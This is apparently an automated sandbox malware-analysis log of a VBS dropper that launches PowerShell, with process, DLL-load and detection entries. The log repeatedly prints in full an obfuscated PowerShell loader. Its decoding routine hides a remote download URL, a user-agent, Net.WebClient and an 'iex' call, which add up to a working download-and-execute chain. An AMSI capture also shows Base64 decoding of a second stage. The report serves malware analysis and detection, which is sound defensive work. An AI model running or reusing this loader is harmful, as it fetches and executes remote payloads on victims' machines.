        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3220:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jnp5ywv5.3x4.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs"
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Megampere='Sub';$Megampere+='strin';$Sensualistiske = 1;$Megampere+='g';Function Skdefrakker($Gyldigt){$Doors=$Gyldigt.Length-$Sensualistiske;For($Papirtigerne=5;$Papirtigerne -lt $Doors;$Papirtigerne+=6){$Reoxygenize+=$Gyldigt.$Megampere.Invoke( $Papirtigerne, $Sensualistiske);}$Reoxygenize;}function Hadaway($Awiggle){ & ($Feeblenesses) ($Awiggle);}$Allitterationernes=Skdefrakker ' InveMUnstaozithazFort.i .ontlAcro.lWo riaOffen/,odel5Snf,e. Svir0Apag. Medle(F aktWAlureiAngwin Salpd fortoAkti wFo,eosDeval ,latfNgrozaT Midt Teleg1Sa.pe0Di,se.bedir0Franc; Toxi Non.WSlur iDerkrnmaner6Qui.q4 Tids; Spaa DiffxAde,o6Non.q4Bedri;fogus Skivr,lommvSlagl:incom1Sti l2 Cy,t1Pundu.Paran0Still),asto LadeGSangueunp,rc ,ithkRoop oPreco/,enom2Besva0Covis1 Inno0Pudsi0Harpe1 B.mp0In,an1Chait GotthFPrikkiSlfanrDrapfeHy,stfPeakioB.gcaxNoi.e/Sanit1Van b2furil1Klept.Augus0Cente ';$Unresponsible=Skdefrakker 'I.ddaUGrappsElbapeHovedrInten-AdskiA Rel.gAgerbeUns,rnFluort In,k ';$Gualaca=Skdefrakker 'SowabhSubtotFedtetAnsatpElizas Forr: uci/Fakul/ ChrorE.togaRecormBenzoiBlundrMozegeCentaxKo le.Grun r LogfoFo,dl/Sli euSchatn,nterp AerorRespoiFnugln MinicLogiciUnderpAquarl.iiiseT.ividR.gti.SketcsVir.eeTr usapaala ';$sacrum=Skdefrakker 'Llers>Frugt ';$Feeblenesses=Skdefrakker 'BulimiRemaie vi.txBryll ';$Lophiostomous='Westfilms';$Opkrsler250 = Skdefrakker ' Lo he TralcUdholh JagtoFreda Brune%Se.weaBrne,pD.iftpChokpdV.lutaOptrktStendaSangu%Slumm\ or dDStandsAbette ,nken S lgerorsc.AramiKopponnU,dereHarmo in,on& A zo&Ko ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors$V lgrgRkeb lSherroStophbOverfaBisexllustr:Mumb.REksemaHaremdStilbiOvereoOtosaa DublcToneatMac.si Out.vSamboePiloc=Prism(DishwcLoo emChiqudblake Ant,t/.gnencSdigh Faste$ GemsOStatsp ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue c
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dsene.Kne && echo t"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Megampere='Sub';$Megampere+='strin';$Sensualistiske = 1;$Megampere+='g';Function Skdefrakker($Gyldigt){$Doors=$Gyldigt.Length-$Sensualistiske;For($Papirtigerne=5;$Papirtigerne -lt $Doors;$Papirtigerne+=6){$Reoxygenize+=$Gyldigt.$Megampere.Invoke( $Papirtigerne, $Sensualistiske);}$Reoxygenize;}function Hadaway($Awiggle){ & ($Feeblenesses) ($Awiggle);}$Allitterationernes=Skdefrakker ' InveMUnstaozithazFort.i .ontlAcro.lWo riaOffen/,odel5Snf,e. Svir0Apag. Medle(F aktWAlureiAngwin Salpd fortoAkti wFo,eosDeval ,latfNgrozaT Midt Teleg1Sa.pe0Di,se.bedir0Franc; Toxi Non.WSlur iDerkrnmaner6Qui.q4 Tids; Spaa DiffxAde,o6Non.q4Bedri;fogus Skivr,lommvSlagl:incom1Sti l2 Cy,t1Pundu.Paran0Still),asto LadeGSangueunp,rc ,ithkRoop oPreco/,enom2Besva0Covis1 Inno0Pudsi0Harpe1 B.mp0In,an1Chait GotthFPrikkiSlfanrDrapfeHy,stfPeakioB.gcaxNoi.e/Sanit1Van b2furil1Klept.Augus0Cente ';$Unresponsible=Skdefrakker 'I.ddaUGrappsElbapeHovedrInten-AdskiA Rel.gAgerbeUns,rnFluort In,k ';$Gualaca=Skdefrakker 'SowabhSubtotFedtetAnsatpElizas Forr: uci/Fakul/ ChrorE.togaRecormBenzoiBlundrMozegeCentaxKo le.Grun r LogfoFo,dl/Sli euSchatn,nterp AerorRespoiFnugln MinicLogiciUnderpAquarl.iiiseT.ividR.gti.SketcsVir.eeTr usapaala ';$sacrum=Skdefrakker 'Llers>Frugt ';$Feeblenesses=Skdefrakker 'BulimiRemaie vi.txBryll ';$Lophiostomous='Westfilms';$Opkrsler250 = Skdefrakker ' Lo he TralcUdholh JagtoFreda Brune%Se.weaBrne,pD.iftpChokpdV.lutaOptrktStendaSangu%Slumm\ or dDStandsAbette ,nken S lgerorsc.AramiKopponnU,dereHarmo in,on& A zo&Ko ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors$V lgrgRkeb lSherroStophbOverfaBisexllustr:Mumb.REksemaHaremdStilbiOvereoOtosaa DublcToneatMac.si Out.vSamboePiloc=Prism(DishwcLoo emChiqudblake Ant,t/.gnencSdigh Faste$ GemsOStatsp ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue cJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dsene.Kne && echo t"Jump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.2237631693.0000023E75FEE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2237168004.0000023E75E4A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb[j source: powershell.exe, 00000002.00000002.2237168004.0000023E75E4A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb3 source: powershell.exe, 00000002.00000002.2237631693.0000023E75FEE000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Megampere='Sub';$Megampere+='strin';$Sensualistiske = 1;$Megampere+='g';Function Skdefrakker($Gyldig", "0")
        Source: Yara matchFile source: 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Teems)$global:Gstgiver = [System.Text.Encoding]::ASCII.GetString($Codevelopers)$global:Antinihilism=$Gstgiver.substring($Romantikers,$Gabions) if (
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Megampere='Sub';$Megampere+='strin';$Sensualistiske = 1;$Megampere+='g';Function Skdefrakker($Gyldigt){$Doors=$Gyldigt.Length-$Sensualistiske;For($Papirtigerne=5;$Papirtigerne -lt $Doors;$Papirtigerne+=6){$Reoxygenize+=$Gyldigt.$Megampere.Invoke( $Papirtigerne, $Sensualistiske);}$Reoxygenize;}function Hadaway($Awiggle){ & ($Feeblenesses) ($Awiggle);}$Allitterationernes=Skdefrakker ' InveMUnstaozithazFort.i .ontlAcro.lWo riaOffen/,odel5Snf,e. Svir0Apag. Medle(F aktWAlureiAngwin Salpd fortoAkti wFo,eosDeval ,latfNgrozaT Midt Teleg1Sa.pe0Di,se.bedir0Franc; Toxi Non.WSlur iDerkrnmaner6Qui.q4 Tids; Spaa DiffxAde,o6Non.q4Bedri;fogus Skivr,lommvSlagl:incom1Sti l2 Cy,t1Pundu.Paran0Still),asto LadeGSangueunp,rc ,ithkRoop oPreco/,enom2Besva0Covis1 Inno0Pudsi0Harpe1 B.mp0In,an1Chait GotthFPrikkiSlfanrDrapfeHy,stfPeakioB.gcaxNoi.e/Sanit1Van b2furil1Klept.Augus0Cente ';$Unresponsible=Skdefrakker 'I.ddaUGrappsElbapeHovedrInten-AdskiA Rel.gAgerbeUns,rnFluort In,k ';$Gualaca=Skdefrakker 'SowabhSubtotFedtetAnsatpElizas Forr: uci/Fakul/ ChrorE.togaRecormBenzoiBlundrMozegeCentaxKo le.Grun r LogfoFo,dl/Sli euSchatn,nterp AerorRespoiFnugln MinicLogiciUnderpAquarl.iiiseT.ividR.gti.SketcsVir.eeTr usapaala ';$sacrum=Skdefrakker 'Llers>Frugt ';$Feeblenesses=Skdefrakker 'BulimiRemaie vi.txBryll ';$Lophiostomous='Westfilms';$Opkrsler250 = Skdefrakker ' Lo he TralcUdholh JagtoFreda Brune%Se.weaBrne,pD.iftpChokpdV.lutaOptrktStendaSangu%Slumm\ or dDStandsAbette ,nken S lgerorsc.AramiKopponnU,dereHarmo in,on& A zo&Ko ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors$V lgrgRkeb lSherroStophbOverfaBisexllustr:Mumb.REksemaHaremdStilbiOvereoOtosaa DublcToneatMac.si Out.vSamboePiloc=Prism(DishwcLoo emChiqudblake Ant,t/.gnencSdigh Faste$ GemsOStatsp ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue c
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Megampere='Sub';$Megampere+='strin';$Sensualistiske = 1;$Megampere+='g';Function Skdefrakker($Gyldigt){$Doors=$Gyldigt.Length-$Sensualistiske;For($Papirtigerne=5;$Papirtigerne -lt $Doors;$Papirtigerne+=6){$Reoxygenize+=$Gyldigt.$Megampere.Invoke( $Papirtigerne, $Sensualistiske);}$Reoxygenize;}function Hadaway($Awiggle){ & ($Feeblenesses) ($Awiggle);}$Allitterationernes=Skdefrakker ' InveMUnstaozithazFort.i .ontlAcro.lWo riaOffen/,odel5Snf,e. Svir0Apag. Medle(F aktWAlureiAngwin Salpd fortoAkti wFo,eosDeval ,latfNgrozaT Midt Teleg1Sa.pe0Di,se.bedir0Franc; Toxi Non.WSlur iDerkrnmaner6Qui.q4 Tids; Spaa DiffxAde,o6Non.q4Bedri;fogus Skivr,lommvSlagl:incom1Sti l2 Cy,t1Pundu.Paran0Still),asto LadeGSangueunp,rc ,ithkRoop oPreco/,enom2Besva0Covis1 Inno0Pudsi0Harpe1 B.mp0In,an1Chait GotthFPrikkiSlfanrDrapfeHy,stfPeakioB.gcaxNoi.e/Sanit1Van b2furil1Klept.Augus0Cente ';$Unresponsible=Skdefrakker 'I.ddaUGrappsElbapeHovedrInten-AdskiA Rel.gAgerbeUns,rnFluort In,k ';$Gualaca=Skdefrakker 'SowabhSubtotFedtetAnsatpElizas Forr: uci/Fakul/ ChrorE.togaRecormBenzoiBlundrMozegeCentaxKo le.Grun r LogfoFo,dl/Sli euSchatn,nterp AerorRespoiFnugln MinicLogiciUnderpAquarl.iiiseT.ividR.gti.SketcsVir.eeTr usapaala ';$sacrum=Skdefrakker 'Llers>Frugt ';$Feeblenesses=Skdefrakker 'BulimiRemaie vi.txBryll ';$Lophiostomous='Westfilms';$Opkrsler250 = Skdefrakker ' Lo he TralcUdholh JagtoFreda Brune%Se.weaBrne,pD.iftpChokpdV.lutaOptrktStendaSangu%Slumm\ or dDStandsAbette ,nken S lgerorsc.AramiKopponnU,dereHarmo in,on& A zo&Ko ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors$V lgrgRkeb lSherroStophbOverfaBisexllustr:Mumb.REksemaHaremdStilbiOvereoOtosaa DublcToneatMac.si Out.vSamboePiloc=Prism(DishwcLoo emChiqudblake Ant,t/.gnencSdigh Faste$ GemsOStatsp ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue cJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD349771C5 push edi; retf 2_2_00007FFD349771C6
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
